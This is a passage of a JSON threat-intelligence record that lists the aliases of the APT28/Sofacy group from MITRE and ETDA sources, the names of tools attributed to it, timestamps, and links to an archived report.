				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434173,
	"ts_updated_at": 1775826678,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/570b18f11507f076c46b8428c1ebcb9dbe685bf9.pdf",
		"text": "https://archive.orkl.eu/570b18f11507f076c46b8428c1ebcb9dbe685bf9.txt",
		"img": "https://archive.orkl.eu/570b18f11507f076c46b8428c1ebcb9dbe685bf9.jpg"
	}
}